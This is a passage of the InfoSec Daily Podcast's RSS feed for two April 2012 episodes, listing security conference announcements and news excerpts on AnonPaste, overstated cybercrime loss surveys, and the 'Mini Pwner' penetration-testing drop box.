		<itunes:summary>InfoSec Daily Podcast Episode 649 for April 19, 2012. Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Adrian Crenshaw and Karthik Rangarajan.
&#160;
Announcements
Outerz0ne 8
	When: April 20-21, 2012
	Where: Wellesley Inn, Atlanta GA
	http://www.outerz0ne.org 
&#160;
Linuxfest Northwest 2012
	When: April 28-29, 2012
	Where: Bellingham Technical College &#8211; Bellingham, WA
	http://www.linuxfestnorthwest.org/
&#160;
AIDE 2012
	When: May 21-25, 2012
	Where: MU Forensic Science Center &#160;- Huntington, West Virginia
	http://www.appyide.org/
&#160;
LayerOne 2012
	When: May 26-27, 2012
	Where: Clarion Hotel &#8211; Anaheim, CA
	http://www.layerone.org
&#160;
Security 504: Hacker Techniques, Exploits &#38; Incident Handling &#8211; Matt Romanek
When: June 20 &#8211; 27, 2012
	Where: Courtyard Seattle Federal Way, WA 
	http://www.sans.org/mentor/details.php?nid=28014
	&#160;
Social Engineering Training
When: July 21-24, 2012
	Where: Black Hat Vegas
When: August 20-24, 2012
	Where: &#160;Bristol, UK
When: &#160;November 12-16, 2012
	Where: &#160;Columbia, MD
	http://www.social-engineer.com/social-engineer-training
&#160;
Inside and Out of the Social-Engineer Toolkit (SET)
	When: July 21 &#8211; 22, 2012
	When: July 23 &#8211; 24, 2012
	Where: Black Hat Vegas
	http://blackhat.com/html/bh-us-12/training/courses/bh-us-12-training_social_engineer_toolkit.html
&#160;
DerbyCon 2012 &#8211; The &#8220;Deuce&#8221; Reunion
	When: &#160;September 27-30, 2012
	Where: Louisville, KY
	http://www.derbycon.com
&#160;
Skydogcon
	When: October 26-28
	Where: Hotel Preston in Nashville, TN 
	http://www.skydogcon.com 
&#160;
Thanks to everyone that has purchased products from Amazon through the affiliate program. &#160;If you&#8217;re not familiar with the affiliate program, simply go to http://www.isdpodcast.com and locate the Affiliate Program link on the right hand side.
&#160;
You don't have a sufficient version of Flash Player to display this animation.
&#160;
Stories
Source: &#160;http://news.techworld.com/personal-tech/3352311/anonymous-launches-anonpaste-alternative-pastebincom
Source: &#160;http://www.peoplesliberationfront.net/anonpaste/index.php?f77e6760ee863006#GZIF9S28dOZ7Qhs4FhbEAftRk5NPIFDqlstEzF9hR2A=
The Anonymous hacking collective has launched a new site that it claims will allow users to post material without fear of being tracked down.
Anonymous described the new site, dubbed AnonPaste, as a safer site than Pastebin.com, which has been used by hackers to post evidence of their exploits.
In a joint statement issued Tuesday, Anonymous and a group calling itself the People&#39;s Liberation Front said the new site will allow people to post any material with complete anonymity.
The statement said posts to the new site would not be censored or moderated in any way.
The two groups said AnonPaste offers 256-bit AES encryption at the browser layer. All data posted to the site will be encrypted and decrypted in the browser so no &#34;usable paste data [is] stored on the server for the authorities or anyone else to seize,&#34; the statement claimed.
&#34;There will be no need for us to police this service, and in fact we don&#39;t even have the ability of deleting any particular paste,&#34; it said.
AnonPaste supports a URL shortening feature and allows users to post up to 2MB of text snippets at a time. Users can specify how long they want the text to remain available on the site.
Pastebin.com was originally created for programmers to temporarily store and share snippets of code and configuration information. Over the years, people have used the site to post and share all sorts of documents and has become a favorite for hackers looking to publicize details of their exploits.
Anonymous, LulzSec and other groups routinely post documents obtained from hacking attacks. Often, the documents posted on Pastebin have included personal, financial and confidential information of individuals and businesses.
Anonymous and the Peop[...]</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, and Dr. Bonez.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 648 &#8211; Overblown, Mini Pwner, 15yo Hacker, Cabin Cr3w, and &#8220;Weird&#8221; Redir</title>
		<link>http://www.isdpodcast.com/episode-648-overblown-mini-pwner-15yo-hacker-cabin-cr3w-and-weird-redir</link>
		<comments>http://www.isdpodcast.com/episode-648-overblown-mini-pwner-15yo-hacker-cabin-cr3w-and-weird-redir#comments</comments>
		<pubDate>Thu, 19 Apr 2012 01:03:17 +0000</pubDate>
		<dc:creator>rick.hayes</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3786</guid>
		<description><![CDATA[InfoSec Daily Podcast Episode 648 for April 18, 2012. Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, and Karthik Rangarajan. &#160; Announcements Outerz0ne 8 When: April 20-21, 2012 Where: Wellesley Inn, Atlanta GA http://www.outerz0ne.org &#160; Linuxfest Northwest 2012 When: April 28-29, 2012 Where: Bellingham Technical College &#8211; Bellingham, WA http://www.linuxfestnorthwest.org/ &#160; AIDE 2012 When: [...]]]></description>
			<content:encoded><![CDATA[<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Daily Podcast Episode 648 for April 18, 2012. </span><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, and Karthik Rangarajan.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Announcements</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Outerz0ne 8<br class="kix-line-break" /><br />
	</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: April 20-21, 2012<br class="kix-line-break" /><br />
	Where: Wellesley Inn, Atlanta GA<br class="kix-line-break" /><br />
	</span><a href="http://www.outerz0ne.org/"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.outerz0ne.org</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Linuxfest Northwest 2012<br class="kix-line-break" /><br />
	</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: April 28-29, 2012<br class="kix-line-break" /><br />
	Where: Bellingham Technical College &#8211; Bellingham, WA<br class="kix-line-break" /><br />
	</span><a href="http://www.linuxfestnorthwest.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.linuxfestnorthwest.org/</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">AIDE 2012<br class="kix-line-break" /><br />
	</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 21-25, 2012<br class="kix-line-break" /><br />
	Where: MU Forensic Science Center &nbsp;- Huntington, West Virginia<br class="kix-line-break" /><br />
	</span><a href="http://www.appyide.org/"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.appyide.org/</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">LayerOne 2012<br class="kix-line-break" /><br />
	</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 26-27, 2012<br class="kix-line-break" /><br />
	Where: Clarion Hotel &#8211; Anaheim, CA<br class="kix-line-break" /><br />
	</span><a href="http://www.layerone.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.layerone.org</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Security 504: Hacker Techniques, Exploits &amp; Incident Handling &#8211; Matt Romanek</span></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: June 20 &#8211; 27, 2012<br class="kix-line-break" /><br />
	Where: Courtyard Seattle Federal Way, WA</span><a href="http://www.sans.org/mentor/details.php?nid=28014"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> <br class="kix-line-break" /><br />
	</span><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.sans.org/mentor/details.php?nid=28014</span></a><br />
	&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Social Engineering Training</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: July 21-24, 2012<br class="kix-line-break" /><br />
	Where: Black Hat Vegas</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: August 20-24, 2012<br class="kix-line-break" /><br />
	Where: &nbsp;Bristol, UK</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;November 12-16, 2012<br class="kix-line-break" /><br />
	Where: &nbsp;Columbia, MD<br class="kix-line-break" /><br />
	</span><a href="http://www.social-engineer.com/social-engineer-training"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.com/social-engineer-training</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Inside and Out of the Social-Engineer Toolkit (SET)<br class="kix-line-break" /><br />
	</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: July 21 &#8211; 22, 2012<br class="kix-line-break" /><br />
	When: July 23 &#8211; 24, 2012<br class="kix-line-break" /><br />
	Where: Black Hat Vegas<br class="kix-line-break" /><br />
	</span><a href="http://blackhat.com/html/bh-us-12/training/courses/bh-us-12-training_social_engineer_toolkit.html"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://blackhat.com/html/bh-us-12/training/courses/bh-us-12-training_social_engineer_toolkit.html</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">DerbyCon 2012 &#8211; The &ldquo;Deuce&rdquo; Reunion<br class="kix-line-break" /><br />
	</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;September 27-30, 2012<br class="kix-line-break" /><br />
	Where: Louisville, KY<br class="kix-line-break" /><br />
	</span><a href="http://www.derbycon.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.derbycon.com</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Skydogcon</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><br class="kix-line-break" /><br />
	When: October 26-28<br class="kix-line-break" /><br />
	Where: Hotel Preston in Nashville, TN <br class="kix-line-break" /><br />
	</span><a href="http://www.skydogcon.com/"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.skydogcon.com</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Thanks to everyone that has purchased products from Amazon through the affiliate program. &nbsp;If you&rsquo;re not familiar with the affiliate program, simply go to</span><a href="../"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.isdpodcast.com</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> and locate the Affiliate Program link on the right hand side.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;">&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Stories</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> &nbsp;</span><a href="http://arstechnica.com/tech-policy/news/2012/04/study-shows-cybercrime-estimates-to-be-overblown.ars"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://arstechnica.com/tech-policy/news/2012/04/study-shows-cybercrime-estimates-to-be-overblown.ars</span></a></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Since the first zero met the first one, people have been shrilly overestimating the effects of computers on our day-to-day lives. Most instances of wild exaggeration are eventually brought back down to earth (at least for a while). It happened with the wild estimates of economic harm done by piracy. The latest aspect of our shared interaction to be punctured is cybercrime, the extent and pervasiveness of which has been described in terms of near-Apocalyptic overstatement, according to the authors of a new report.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The report, &quot;Sex, Lies and Cyber-crime Surveys&quot; (</span><a href="https://research.microsoft.com/pubs/149886/SexLiesandCybercrimeSurveys.pdf"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">PDF</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">), by Dinei Florencio and Cormac Herley of Microsoft Research, has now been released.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">In an </span><a href="http://www.nytimes.com/2012/04/15/opinion/sunday/the-cybercrime-wave-that-wasnt.html?_r=3&amp;nl=todaysheadlines&amp;emc=edit_th_20120415"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">op-ed</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> in the </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:none;vertical-align:baseline;">New York Times</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> that coincided with the report&#39;s release, they wrote, &quot;One recent estimate placed annual direct consumer losses at $114 billion worldwide. It turns out, however, that such widely circulated cybercrime estimates are generated using absurdly bad statistical methods, making them wholly unreliable.&quot;</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">What initially attracted the authors&#39; attention was the disparity between the huge figures and the fact that access to these resources (money, via hacking) is relatively easy.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;The demand for easy money outstrips supply. Is cybercrime an exception?&quot; Florencio and &nbsp;Herley asked. &quot;If getting rich were as simple as downloading and running software, wouldn&#39;t more people do it, and thus drive down returns?&quot;</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The problem, they discovered, was in the manner of gathering the cybercrime loss figures. They were put together via surveys.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;First, losses are extremely concentrated,&quot; they wrote in the report, &quot;so that representative sampling of the population does not give representative sampling of the losses. Second, losses are based on unverified self-reported numbers. Not only is it possible for a single outlier to distort the result, we find evidence that most surveys are dominated by a minority of responses in the upper tail.&quot;</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Because the survey results are not representative of the population as a whole, each reported loss in one of the surveys is extrapolated to a large, and unsupported, amount in the general population.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;One unverified claim of $7,500 in phishing losses translates into $1.5 billion.&quot;</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">A combination of the remarkably enduring fiction that anything with an &quot;e&quot; or an &quot;i&quot; in front of it is </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:none;vertical-align:baseline;">terra incognita</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">, a land of mystery where precedents are nonexistent and the normal rules of space and time do not hold, combined with, well, lazy thinking, have, the authors maintained, created a common wisdom wildly out of sync with simple facts and basic mathematics.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="http://www.forbes.com/sites/andygreenberg/2012/04/17/hackers-tiny-spy-computer-cracks-corporate-networks-fits-in-an-altoid-tin/"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.forbes.com/sites/andygreenberg/2012/04/17/hackers-tiny-spy-computer-cracks-corporate-networks-fits-in-an-altoid-tin/</span></a></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The next time an unexpected &ldquo;repairman&rdquo; cruises past your company&rsquo;s security desk, you might want to check inside his tin of mints or pack of cigarettes. Especially if he&rsquo;s also carrying an ethernet cable.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Kevin Bong, a Wisconsin-based security researcher and penetration tester, has developed what he calls the Mini Pwner, a spy computer smaller than a smartphone designed to be inconspicuously plugged into an ethernet port to gain access to a corporate network, feeding information back to a nearby hacker over its wifi signal. Bong sells a kit for the mini spy node for $99, but he also explains on his</span><a href="http://www.minipwner.com/"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">website</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> how to put one together independently with just a TP-Link router running the open source OpenWRT software, a USB thumb drive, and a battery pack&ndash;components that add up to less than $40.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The result is a network cracking tool that&rsquo;s just two inches square by one inch thick. Or with a bit more hardware fiddling, the Mini Pwner can even be removed from the TP-Link router&rsquo;s plastic case and reassembled small enough to fit in an Altoids tin&ndash;a variant that Bong calls the &ldquo;Minty Pwner.&rdquo; (He admits the metal case might interfere with the router&rsquo;s signal if it&rsquo;s left inside.)</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Bong says he built the Mini Pwner, whose name refers to the hacker lingo &ldquo;to pwn&rdquo; meaning to hack or gain control of a target, to aid in his day-to-day work sussing out clients&rsquo; security vulnerabilities as a penetration tester for the Brookfield, Wisconsin consultancy Synercomm. &ldquo;The easiest way to get into a company is still to walk in looking professional and talk your way into a wiring closet,&rdquo; says Bong. &ldquo;Once this thing is configured, you can plug it in to the network you&rsquo;re attacking and connect back to the router itself from the parking lot.&rdquo;</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Once it&rsquo;s plugged into an open ethernet port on a wall, in a server closet or even into one of a company&rsquo;s IP phones, the Mini Pwner is designed to run simple scanning tools including Nmap and dSniff that allow a hacker to map out a company&rsquo;s network and passively collect information. More importantly, it can create a VPN connection so that a nearby hacker can connect to the tiny router&rsquo;s wifi signal, tunnel into the target network, and run hacking tools like Metasploit to gain further access. The battery pack offers at least four hours of hacking time, Bong says, but a USB port on the Pwner can also be hooked up to power the device indefinitely.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="http://www.zdnet.com/blog/security/15-year-old-arrested-for-hacking-259-companies/11585"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.zdnet.com/blog/security/15-year-old-arrested-for-hacking-259-companies/11585</span></a></p>
